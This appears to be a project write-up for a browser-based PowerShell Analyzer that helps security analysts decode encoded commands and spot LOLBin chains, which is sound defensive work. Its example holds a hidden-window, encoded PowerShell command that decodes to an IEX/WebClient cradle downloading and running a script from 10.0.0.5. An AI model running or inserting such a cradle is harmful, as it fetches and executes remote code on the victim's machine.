PowerShell Analyzer

Problem

Suspicious PowerShell shows up in alerts constantly. The standard analyst move — paste the command into a sandbox or sanitizer — runs into a wall in environments with strict data-handling controls, where pasting an alert payload into a third-party service isn’t allowed. Junior analysts then either skip the analysis (and lose context) or wait for a senior to translate (and stall the queue).

Approach

PowerShell Analyzer is a single-file HTML tool that runs entirely in the browser. No network calls, no model weights. Paste a command and it parses execution flags, decodes Base64 payloads — including the UTF-16LE encoding PowerShell actually uses for -EncodedCommand — identifies LOLBins from a curated database, and outputs a step-by-step breakdown.

Input:
  powershell -NoP -W hidden -Enc <base64 string>

Breakdown:
  -NoProfile           Skip user PowerShell profile load
  -WindowStyle hidden  Hide the window from the user
  -EncodedCommand      Decoded payload (UTF-16LE):
                       IEX (New-Object Net.WebClient).DownloadString(
                         'http://10.0.0.5/x.ps1'
                       )

LOLBin chain:
  PowerShell → IEX → WebClient.DownloadString
  Pattern: remote script load and inline execution

Outcome

A junior analyst who used to wait twenty minutes for a senior to translate a -EncodedCommand blob now gets a structured breakdown in seconds. The decoded output drops directly into the investigation note — same format every time, auditable, and the alert payload never left the analyst’s machine.

What’s next

Obfuscation-detection heuristics are the natural next layer: string concatenation patterns, character-level evasion, format-string tricks. The current parser handles common cases cleanly; the long tail of evasion variants is where the real work is.